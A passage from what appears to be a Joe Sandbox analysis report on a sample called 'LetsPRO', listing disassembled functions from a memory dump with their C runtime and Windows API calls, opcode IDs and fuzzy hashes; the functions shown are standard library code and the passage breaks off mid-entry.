                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno_invalid_parameter_noinfo_tolower_l$___ascii_strnicmp
                                        • String ID:
                                        • API String ID: 2390777603-0
                                        • Opcode ID: 9141c522577d29ab2f7b1dc59a431d55781197e61062b4e5af29aeb735c960a5
                                        • Instruction ID: 3511976d5e8659fbba6595f969e6ad5a191febbb5d2013b1eaee7abd4a0a2591
                                        • Opcode Fuzzy Hash: 9141c522577d29ab2f7b1dc59a431d55781197e61062b4e5af29aeb735c960a5
                                        • Instruction Fuzzy Hash: D7210431A05289DFDF119F68CC457BE3BA8BF12368F240698A4305BAD4DB31CA14C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C914C80 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: NameName::$Name::operator+
                                        • String ID: void$void
                                        • API String ID: 826178784-3746155364
                                        • Opcode ID: 0dfd3388a3f5f4a31979c4edf829ec42fb65231c01203b4267fb15518eeab002
                                        • Instruction ID: 2f7d1a33c162f91f89965d06dcdb0d4a29f08e6a264e6f068a930585e5411415
                                        • Opcode Fuzzy Hash: 0dfd3388a3f5f4a31979c4edf829ec42fb65231c01203b4267fb15518eeab002
                                        • Instruction Fuzzy Hash: FC210476A0911DAFCF04DF94C841CED7BB9EF69708F50405AE915A6A50EB30DA8A8F90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C949EE5 Relevance: 10.6, APIs: 7, Instructions: 68synchronizationsleeptimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,6C949EDA), ref: 6C949EFA
                                        • Concurrency::details::SchedulerBase::ThrottlingTime.LIBCMT ref: 6C949F13
                                        • GetTickCount.KERNEL32 ref: 6C949F1A
                                        • Sleep.KERNEL32(00000000), ref: 6C949F30
                                        • InterlockedPushEntrySList.KERNEL32(?,-00000008), ref: 6C949F67
                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6C949F90
                                        • CloseHandle.KERNEL32(?), ref: 6C949FAB
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ObjectSingleWait$Base::CloseConcurrency::details::CountEntryHandleInterlockedListPushSchedulerSleepThrottlingTickTime
                                        • String ID:
                                        • API String ID: 3893709443-0
                                        • Opcode ID: 1c5052bba3fea65fa1f37cf062426fd07627655ff568b771fe95ebe57b8da985
                                        • Instruction ID: 49c5ac1ec7c9b1640bfedfad6726fcd36b947523ec5dec3d85ea2e1de37ffefe
                                        • Opcode Fuzzy Hash: 1c5052bba3fea65fa1f37cf062426fd07627655ff568b771fe95ebe57b8da985
                                        • Instruction Fuzzy Hash: 4421E771704202AFDB158B35CD88BDEB7ACFB51369F144374E12682A80CB35DC65CB80
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9469EF Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C9469F6
                                        • InitializeSListHead.KERNEL32(?,00000010,6C946DD9,00000000,?), ref: 6C946A14
                                        • GetLastError.KERNEL32 ref: 6C946A47
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000), ref: 6C946A5F
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000), ref: 6C946A6D
                                        • GetLastError.KERNEL32 ref: 6C946A87
                                        • ??2@YAPAXI@Z.MSVCR100(00000030), ref: 6C946A95
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: ErrorLast$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorExceptionH_prolog3HeadInitializeListThrow
                                        • String ID:
                                        • API String ID: 3312236879-0
                                        • Opcode ID: 5173ecfa02be9c58d511e583fe003ad784648f514ff715e52652105b6b82c3a9
                                        • Instruction ID: 58f3283cc602e93e33f5aff474febff7b1557db828f0b35b540334943cbe0cf5
                                        • Opcode Fuzzy Hash: 5173ecfa02be9c58d511e583fe003ad784648f514ff715e52652105b6b82c3a9
                                        • Instruction Fuzzy Hash: F521C0B2684A06DFD711CFA4C850A9E77F8AF55348B20C82AE459D7A00EB30E509CB55
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C938B3C Relevance: 10.6, APIs: 7, Instructions: 65threadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C938B43
                                          • Part of subcall function 6C936357: __EH_prolog3.LIBCMT ref: 6C93635E
                                          • Part of subcall function 6C936357: ??_U@YAPAXI@Z.MSVCR100(00000000,00000000,6C938B58,?,000000FF), ref: 6C9363D5
                                          • Part of subcall function 6C936357: _memset.LIBCMT(00000000,00000000,?,00000000,6C938B58,?,000000FF), ref: 6C9363E7
                                        • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,?,000000FF,00000001,00000010,6C940C94,00000000,00000000,00000000,?,?,00000000,6C9A001C), ref: 6C938B73
                                        • GetLastError.KERNEL32(?,?,00000000,6C9A001C,000000FF,?,6C940B58,?,?,?,00000000), ref: 6C938B83
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,?,00000000,6C9A001C,000000FF,?,6C940B58,?,?,?,00000000), ref: 6C938B9B
                                        • _CxxThrowException.MSVCR100(?,6C9A0D48,00000000,?,?,00000000,6C9A001C,000000FF,?,6C940B58,?,?,?,00000000), ref: 6C938BA9
                                        • ??2@YAPAXI@Z.MSVCR100(0000001C,00000000,?,?,00000000,6C9A001C,000000FF,?,6C940B58,?,?,?,00000000), ref: 6C938BBB
                                        • GetCurrentThreadId.KERNEL32 ref: 6C938BF0
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: H_prolog3$??2@Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorCreateCurrentErrorEventExceptionLastThreadThrow_memset
                                        • String ID:
                                        • API String ID: 1790702778-0
                                        • Opcode ID: b246585e0c5d066b4824865191bf4ee949ecba64c6e5a3c58e8998026f71d501
                                        • Instruction ID: 6ab71e886298fdc3f364dcfdc13d1c0c2ca41c2f9d414f491500535dbc641627
                                        • Opcode Fuzzy Hash: b246585e0c5d066b4824865191bf4ee949ecba64c6e5a3c58e8998026f71d501
                                        • Instruction Fuzzy Hash: E921C0F1A00396AFD7049F718884A9ABFB4FF24358B54952EE11CCBA00CB34D859DB94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90A6FA Relevance: 10.6, APIs: 7, Instructions: 63COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _get_osfhandle.MSVCR100(?,?,?,?,6C90A7D5,?,6C90A7F0,00000010), ref: 6C90A705
                                        • _get_osfhandle.MSVCR100(?), ref: 6C90A728
                                          • Part of subcall function 6C90A6B5: __doserrno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C90A6F0
                                          • Part of subcall function 6C90A6B5: _errno.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C930499
                                          • Part of subcall function 6C90A6B5: _invalid_parameter_noinfo.MSVCR100(?,6C9786AC,?,?,?,?,?,?,6C92FE52,?,00000000,00000000,00000002,?,00000002,?), ref: 6C9304A4
                                        • CloseHandle.KERNEL32(00000000), ref: 6C90A72F
                                        • _get_osfhandle.MSVCR100(00000002), ref: 6C915B02
                                        • _get_osfhandle.MSVCR100(00000001,00000002), ref: 6C915B0B
                                        • GetLastError.KERNEL32 ref: 6C92F50A
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _get_osfhandle$CloseErrorHandleLast__doserrno_errno_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 1012986785-0
                                        • Opcode ID: 6e711e1717cd53af7f83c3ffd13195ddb8a86801d8b88e109122b5a23fbe3e92
                                        • Instruction ID: 710e279e892ad811f2329a02daa75e2316838cfee8c6239e3e0b35b59081b07f
                                        • Opcode Fuzzy Hash: 6e711e1717cd53af7f83c3ffd13195ddb8a86801d8b88e109122b5a23fbe3e92
                                        • Instruction Fuzzy Hash: E7112B33B5A5945AD31146796848BEE36B98F93B6DF26011DE876CBFC0DF64C48182D0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C90EC51 Relevance: 10.6, APIs: 7, Instructions: 57COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • __doserrno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C90EAFD
                                        • __doserrno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C93035D
                                        • _errno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C930365
                                        • _errno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C93037B
                                        • _invalid_parameter_noinfo.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C930386
                                        • _errno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C93038D
                                        • __doserrno.MSVCR100(6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?,?,6C9138D9,?,?), ref: 6C930398
                                          • Part of subcall function 6C90A51F: EnterCriticalSection.KERNEL32(00000108,6C90A580,0000000C,6C90ECA7,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002,?,6C9A45D0,?,?), ref: 6C90A570
                                          • Part of subcall function 6C90EB48: _isatty.MSVCR100(?,?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E,?,00000000,00000002), ref: 6C90EBD7
                                          • Part of subcall function 6C90EB48: WriteFile.KERNEL32(00000000,?,?,?,00000000,?,00000002,?,?,6C90ECC5,?,?,?,6C90ECE0,00000010,6C928A4E), ref: 6C90EC08
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: __doserrno_errno$CriticalEnterFileSectionWrite_invalid_parameter_noinfo_isatty
                                        • String ID:
                                        • API String ID: 3635451409-0
                                        • Opcode ID: de786e26189aede6641ad683e8897a7024348b1c8707e175f7911e720c7f649a
                                        • Instruction ID: c379a93c51afa9f3eed9468d3adca63ffe9191d9443b5c90a26dcc41f7be91e6
                                        • Opcode Fuzzy Hash: de786e26189aede6641ad683e8897a7024348b1c8707e175f7911e720c7f649a
                                        • Instruction Fuzzy Hash: 43119071A41794DFD7118FA4C8817AD3760BF32329F151688D4745BEE1CFB9C9088BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C93FC74 Relevance: 10.6, APIs: 7, Instructions: 56COMMON
                                        Download Yara Rule
                                        APIs
                                        • __EH_prolog3.LIBCMT ref: 6C9404B4
                                          • Part of subcall function 6C9423CD: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000002), ref: 6C9423DA
                                          • Part of subcall function 6C9423CD: std::exception::exception.LIBCMT(?,00000008,00000002), ref: 6C9423F2
                                          • Part of subcall function 6C9423CD: _CxxThrowException.MSVCR100(?,6C9A0EC8,?,00000008,00000002), ref: 6C942407
                                          • Part of subcall function 6C9423CD: ?GetPolicyValue@SchedulerPolicy@Concurrency@@QBEIW4PolicyElementKey@2@@Z.MSVCR100(00000008,00000002), ref: 6C942411
                                        • ??3@YAXPAX@Z.MSVCR100(?,6C9A55E0,?,00000014), ref: 6C9404F4
                                        • ??3@YAXPAX@Z.MSVCR100(?,?,6C9A55E0,?,00000014), ref: 6C9404FA
                                        • ??2@YAPAXI@Z.MSVCR100(00000004,6C9A55E0,?,00000014), ref: 6C940503
                                        • ??0SchedulerPolicy@Concurrency@@QAE@ABV01@@Z.MSVCR100(?,6C9A55E0,?,00000014), ref: 6C940519
                                        • Concurrency::unsupported_os::unsupported_os.LIBCMT(?,00000014), ref: 6C94053E
                                        • _CxxThrowException.MSVCR100(?,6C940558,?,00000014), ref: 6C94054C
                                          • Part of subcall function 6C93B397: ?_SpinOnce@?$_SpinWait@$00@details@Concurrency@@QAE_NXZ.MSVCR100 ref: 6C93B3B9
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Concurrency@@Policy$Policy@Scheduler$??3@ElementExceptionKey@2@@SpinThrowValue@$??2@Concurrency::unsupported_os::unsupported_osH_prolog3Once@?$_V01@@Wait@$00@details@std::exception::exception
                                        • String ID:
                                        • API String ID: 4136520310-0
                                        • Opcode ID: 9a6d3b6a6b5b41d7a592ff359488ae415a238af7d3f5e2b6d0b1936db676469a
                                        • Instruction ID: 83a1c2677b01f242e5d55d902aa4f88525fe9e4a2e01b596822174bfb977e483
                                        • Opcode Fuzzy Hash: 9a6d3b6a6b5b41d7a592ff359488ae415a238af7d3f5e2b6d0b1936db676469a
                                        • Instruction Fuzzy Hash: 5C11E330A46288DEEF489BA5D4047DD37B5FF75318F14A01AE405A7A90DB74C6088B19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9145B4 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Name::operator+$NameName::
                                        • String ID: throw(
                                        • API String ID: 168861036-3159766648
                                        • Opcode ID: 38a7146d208e128509321dc4d5700168800a6bfa2c7c870a6e957a2ccff37194
                                        • Instruction ID: cdd9410c58c0d3a1b779b583258212e50a3a1186d93a3fa42b05c05ef698f525
                                        • Opcode Fuzzy Hash: 38a7146d208e128509321dc4d5700168800a6bfa2c7c870a6e957a2ccff37194
                                        • Instruction Fuzzy Hash: CB018036610209AEDF04DBA4D855DEE3BB9EF58708F404058E441ABB94EB34E949CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C95AA68 Relevance: 10.5, APIs: 7, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C95AA73
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C95AA7E
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __wsopen_s.LIBCMT(00000000,00000000,00008002,00000040,00000000), ref: 6C95AA98
                                        • __futime64.LIBCMT(00000000,?), ref: 6C95AAAC
                                        • _errno.MSVCR100 ref: 6C95AABA
                                        • _close.MSVCR100(00000000), ref: 6C95AAC9
                                        • _errno.MSVCR100 ref: 6C95AAD4
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__futime64__wsopen_s_close_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 503974632-0
                                        • Opcode ID: a8c435c8c545b5755e31808c08f2c9d9f7116d52a5accc4263a91a1fa76bf409
                                        • Instruction ID: 5576cd98aab7dbd48e2a042897c5cf1d54201c4962751393f769f74c402bcdc0
                                        • Opcode Fuzzy Hash: a8c435c8c545b5755e31808c08f2c9d9f7116d52a5accc4263a91a1fa76bf409
                                        • Instruction Fuzzy Hash: 6C01F236600108ABDB005EA9DC00BDC3B2AAFA0778F558250FA285BAE0DF31C95587B4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C959FB3 Relevance: 10.5, APIs: 7, Instructions: 47COMMON
                                        Download Yara Rule
                                        APIs
                                        • _errno.MSVCR100 ref: 6C959FBE
                                        • _invalid_parameter_noinfo.MSVCR100 ref: 6C959FC9
                                          • Part of subcall function 6C97B066: _invalid_parameter.MSVCR100(00000000,00000000,00000000,00000000,00000000,6C94B73F,?,6C94C2BB,00000003,6C9274E4,6C90A988,0000000C,6C927537,00000001,00000001), ref: 6C97B06D
                                        • __wsopen_s.LIBCMT(00000000,00000000,00008002,00000040,00000000), ref: 6C959FE3
                                        • __futime32.LIBCMT(00000000,?), ref: 6C959FF7
                                        • _errno.MSVCR100 ref: 6C95A005
                                        • _close.MSVCR100(00000000), ref: 6C95A014
                                        • _errno.MSVCR100 ref: 6C95A01F
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _errno$__futime32__wsopen_s_close_invalid_parameter_invalid_parameter_noinfo
                                        • String ID:
                                        • API String ID: 2633586827-0
                                        • Opcode ID: 3437b4275c22bb155c0a37b7572f8321a4f854fd2630a4141899ef9c60a11c1b
                                        • Instruction ID: e92d4e00056980bbcd207aa82739104c5b69cbc38a46c8fa9d1ff97af9d27e34
                                        • Opcode Fuzzy Hash: 3437b4275c22bb155c0a37b7572f8321a4f854fd2630a4141899ef9c60a11c1b
                                        • Instruction Fuzzy Hash: 3F01F232604108AADB005F75DC00BCD3B29EFA1738F518250FA2C5BAE0DF32C865C7A0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C938C44 Relevance: 10.5, APIs: 7, Instructions: 38threadCOMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • GetCurrentProcess.KERNEL32(00000088,00000000,00000000,00000002,00000000,00000000,6C9A001C,000000FF,?,6C940B58,?,?,?,00000000), ref: 6C938C60
                                        • GetCurrentThread.KERNEL32 ref: 6C938C63
                                        • GetCurrentProcess.KERNEL32(00000000,?,6C940B58,?,?,?,00000000), ref: 6C938C6A
                                        • DuplicateHandle.KERNEL32(00000000,?,6C940B58,?,?,?,00000000), ref: 6C938C6D
                                        • GetLastError.KERNEL32(?,6C940B58,?,?,?,00000000), ref: 6C938C77
                                        • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCMT(00000000,?,6C940B58,?,?,?,00000000), ref: 6C938C8F
                                        • _CxxThrowException.MSVCR100(6C9A0D48,6C9A0D48,00000000,?,6C940B58,?,?,?,00000000), ref: 6C938C9D
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: Current$Process$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorExceptionHandleLastThreadThrow
                                        • String ID:
                                        • API String ID: 2881127307-0
                                        • Opcode ID: ded503b6952e5343b2fe126b28c32a0ac90a7e0c76387d85d8c36eb982d39897
                                        • Instruction ID: a50796787e3e18a31d0bee7b482503b40d692e546221691aaf3e2e41d5723291
                                        • Opcode Fuzzy Hash: ded503b6952e5343b2fe126b28c32a0ac90a7e0c76387d85d8c36eb982d39897
                                        • Instruction Fuzzy Hash: 44F0B4B2A0026576CB24A7B19C0DFDB3A7CAFA5788F409526B125E3580DF38E405C7E4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C9742B3 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37COMMONLIBRARYCODE
                                        Download Yara Rule
                                        APIs
                                        • _FindAndUnlinkFrame.MSVCR100(?,6C97429F,?), ref: 6C9742BC
                                          • Part of subcall function 6C918411: _getptd.MSVCR100 ref: 6C918417
                                          • Part of subcall function 6C918411: _getptd.MSVCR100 ref: 6C91842B
                                        • _getptd.MSVCR100(6C97429F,?), ref: 6C9742C2
                                        • _getptd.MSVCR100(6C97429F,?), ref: 6C9742D0
                                        • _IsExceptionObjectToBeDestroyed.MSVCR100(?), ref: 6C974313
                                        • __DestructExceptionObject.MSVCR100(00000000,00000000), ref: 6C974321
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000005.00000002.2176970431.000000006C8F1000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C8F0000, based on PE: true
                                        • Associated: 00000005.00000002.2176665564.000000006C8F0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177784339.000000006C9A4000.00000004.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2177974390.000000006C9A6000.00000008.00000001.01000000.00000006.sdmpDownload File
                                        • Associated: 00000005.00000002.2178327464.000000006C9A9000.00000002.00000001.01000000.00000006.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_5_2_6c8f0000_LetsPRO.jbxd
                                        Similarity
                                        • API ID: _getptd$ExceptionObject$DestroyedDestructFindFrameUnlink
                                        • String ID: csm
                                        • API String ID: 473968603-1018135373
                                        • Opcode ID: 3f10fad894707037d4f1be91083b805b1c86e0196aeef020e4e17791f3ad9fd2
                                        • Instruction ID: e46517d51f4df2809d68ea31933d887bfb41b82d575654876aabb92947479ba6
                                        • Opcode Fuzzy Hash: 3f10fad894707037d4f1be91083b805b1c86e0196aeef020e4e17791f3ad9fd2
                                        • Instruction Fuzzy Hash: 1E01A234906305CADB388F25C540A9CB7F9AF2021BFA54A2ED05996E91CB30C585DF20
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 6C94E9BA Relevance: 10.5, APIs: 7, Instructions: 35COMMON
                                        Download Yara Rule
                                        APIs
                                        • __doserrno.MSVCR100 ref: 6C94E9C5
